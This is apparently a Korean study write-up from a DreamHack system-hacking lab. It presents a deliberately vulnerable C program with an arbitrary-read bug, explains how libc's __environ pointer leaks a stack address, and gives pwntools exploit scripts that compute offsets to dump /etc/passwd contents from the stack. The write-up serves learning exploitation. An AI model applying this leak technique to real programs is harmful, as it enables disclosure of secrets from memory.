[DreamHack System Hacking] Linux Library exploit > __environ

프로세스는 환경 변수 정보를 저장하고, 필요할 때마다 불러와 사용한다.

라이브러리 함수에서 환경 변수 포인터와 관련된 공격에 대해 알아보고자 한다.

이전에 환경 변수를 어느 영역에 저장하고, 어떻게 참조하는지 알고 있어야 하기 때문에 이를 먼저 알아보자.

 

실습 코드느 다음과 같다.

// Name: environ.c
// Compile: gcc -o environ environ.c
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>
#include <signal.h>
#include <stdlib.h>
void sig_handle() {
  exit(0);
}
void init() {
  setvbuf(stdin, 0, 2, 0);
  setvbuf(stdout, 0, 2, 0);
  signal(SIGALRM, sig_handle);
  alarm(5);
}
void read_file() {
  char file_buf[4096];
  int fd = open("/etc/passwd", O_RDONLY);
  read(fd, file_buf, sizeof(file_buf) - 1);
  close(fd);
}
int main() {
  char buf[1024];
  long addr;
  int idx;
  init();
  read_file();
  printf("stdout: %p\n", stdout);
  while (1) {
    printf("> ");
    scanf("%d", &idx);
    switch (idx) {
      case 1:
        printf("Addr: ");
        scanf("%ld", &addr);
        printf("%s", (char *)addr);
        break;
      default:
        break;
    }
  }
  return 0;
}

 

 

 

 

환경 변수

환경변수 (Environment Variable)

: 매번 변할 수 있는 동적인 값들의 모임으로, 시스템의 정보를 갖고 있는 변수

-> 사용자가 직접 추가 및 수정하거나 삭제할 수 있는 값이다.

 

환경 변수는 터미널 뿐만 아니라 프로그램에서도 참조한다. 프로그램에서도 명령어를 실행해야 하는 경우가 종종 있으며, 절대 경로를 입력하지 않아도 명령어를 실행할 수 있다. 프로세스를 로드하면서 환경변수를 초기화하는 게 가능하기 때문이다.

 

리눅스 바이너리를 공격할 때 상황에 따라 스택 주소를 알아내야 할 때가 있다. 하지만 기본적으로 리눅스 바이너리는 스택 주소를 포함하지 않기 때문에 스택 주소를 전역 변수에 저장하는 코드가 있지 않는 한 바이너리 주소 내에서 스택 주소를 찾는 것은 불가능하다. 환경 변수에 대한 정보는 스택 영역에 존재하고, 라이브러리 함수를 실행할 때도 해당 정보를 참조하기 때문에 환경 변수를 가리키는 포인터가 별도로 선언되어 있다.

따라서, 해당 라이브러리 주소를 알고 있고, 임의의 주소를 읽어낼 수 있는 취약점이 있다면 스택 주소를 알아낼 수 있다.

 

 

 

 

__environ

libc.so.6 내 environ 주소

다음은 libc.so.6 파일에서 environ 심볼을 찾는 명령어를 실행한 화면이다.

__environ 이라는 이름의 전역 변수가 존재하는 걸 확인할 수 있다. 이는 시스템 명령어를 실행하기 위한 execve 계열의 함수와 getenv 등 환경 변수와 관련된 함수에서 참조하는 변수이다.

 

앞서 언급한 실습 예제를 컴파일한 뒤 디버깅해서 포인터에 어떤 주소가 있는지 확인해보자.

다음과 같이 디버깅해서 __environ 포인터의 주소를(0x00007fffffffe038) 확인하고, 해당 주소가 가리키는 결과를 확인해봤다.

이는 더블 포인터로, 각각의 환경 변수 문자열이 포함된 주소를 갖고 있는 걸 확인할 수 있으며 해당 주소를 vmmap 명령어로 확인해보니 스택 영역인 걸 확인할 수 있었다.

 

라이브러리 주소를 알고 있고, 해당 주소를 읽을 수 있는 취약점이 있는 경우, 스택 주소를 릭하고 공격에 이용할 수 있다.

 

 

 

 

 

코드 분석

보호 기법🛡️

 

실습 코드의 일부(메인함수)를 살펴보자.

int main() {
  char buf[1024];
  long addr;
  int idx;
  init();
  read_file();
  printf("stdout: %p\n", stdout);
  while (1) {
    printf("> ");
    scanf("%d", &idx);
    switch (idx) {
      case 1:
        printf("Addr: ");
        scanf("%ld", &addr);
        printf("%s", (char *)addr);
        break;
      default:
        break;
    }
  }
  return 0;
}

메인 함수에서는 stdout 라이브러리 주소를 출력하고, 반복해서 임의 주소에 있는 값을 읽을 수 있는(read_file) 취약점이 존재한다.

 

 

 

 

 

익스플로잇

__environ 주소 계산

stdout 주소를 획득한 다음 라이브러리에서 해당 심볼의 주소를 알아낸 뒤 뺄셈을 통해 라이브러리 베이스 주소를 알아낼 수 있다.

그 다음 전에 구했던 __environ 포인터의 심볼 주소를 더해서 해당 포인터의 주소를 구해야 한다.

 

# Name: environ.py
from pwn import *
p = process("./environ")
elf = ELF('/lib/x86_64-linux-gnu/libc.so.6')
p.recvuntil(": ")
stdout = int(p.recvuntil("\n"),16)
libc_base = stdout - elf.symbols['_IO_2_1_stdout_']
libc_environ = libc_base + elf.symbols['__environ']
print(hex(libc_base))
print(hex(libc_environ))
p.interactive()

다음의 익스플로잇 코드는 pwntools에서 제공하는 ELF 클래스를 사용해 각 심볼의 주소를 알아내는 코드이다.

라이브러리의 정보를 읽어 _IO_2_1_stdout과 __environ 심볼의 주소를 알아내고, 오프셋을 계산해서 실제 주소를 알아낸다.

코드를 실행하면 아래와 같다.

 

라이브러리 베이스 주소와 __environ 주소를 알아낸 걸 확인할 수 있다.

 

 

 

 

스택 주소 계산

__environ의 주소를 알아냈으니 임의 주소 읽기 취약점을 사용해서 스택 주소를 구하고, 이를 기반으로 파일의 내용이 저장된 스택 버퍼의 주소를 알아내야 한다.

파일 내용이 저장된 스택 버퍼와 __environ 변수가 가리키는 스택 주소와 거리 간격은 디버깅을 통해 알아낼 수 있다.

디스어셈블 한 결과를 확인하니 +77 부분에서 파일을 읽기 때문에 이 부분에 브레이크를 걸어보자.

read 함수의 인자를 확인하면 파일의 내용을 저장하는 위치는 RCX 레지스터이므로, 해당 스택 버퍼 주소에 파일의 내용이 저장된다.

그 다음, __environ 포인터 주소가 앞서 알아낸 스택 버퍼 주소를 뺼셈하여 간격을 알아낸다. 위의 화면을 확인하면 알 수 있듯, 두 주소의 0x1538임을 알 수 있다.

 

 

 

 

파일 내용 읽기

두 주소의 간격을 알아낸다음, __environ 주소에서 두 주소의 간격인 0x1538을 뺀 주소를 임의 주소 읽기 취약점을 통해 출력한다.

# Name: environ.py
from pwn import *

p = process("./environ")
elf = ELF('/lib/x86_64-linux-gnu/libc.so.6')

p.recvuntil(": ")

stdout = int(p.recvuntil("\n"),16)
libc_base = stdout - elf.symbols['_IO_2_1_stdout_']
libc_environ = libc_base + elf.symbols['__environ']

print(hex(libc_base))
print(hex(libc_environ))

p.sendlineafter(">", "1")
p.sendlineafter(":", str(libc_environ))

p.recv(1)
stack_environ = u64(p.recv(6).ljust(8, b"\x00")) 
file_content = stack_environ - 0x1538

print("stack_environ: " + hex(stack_environ))

p.sendlineafter(">", "1")
p.sendlineafter(":", str(file_content))

p.interactive()

 

익스플로잇 코드를 실행한 결과는 다음과 같다. (에러가 나서 코드 중 일부분(\x00앞)을 바이트 처리로 바꿨다.)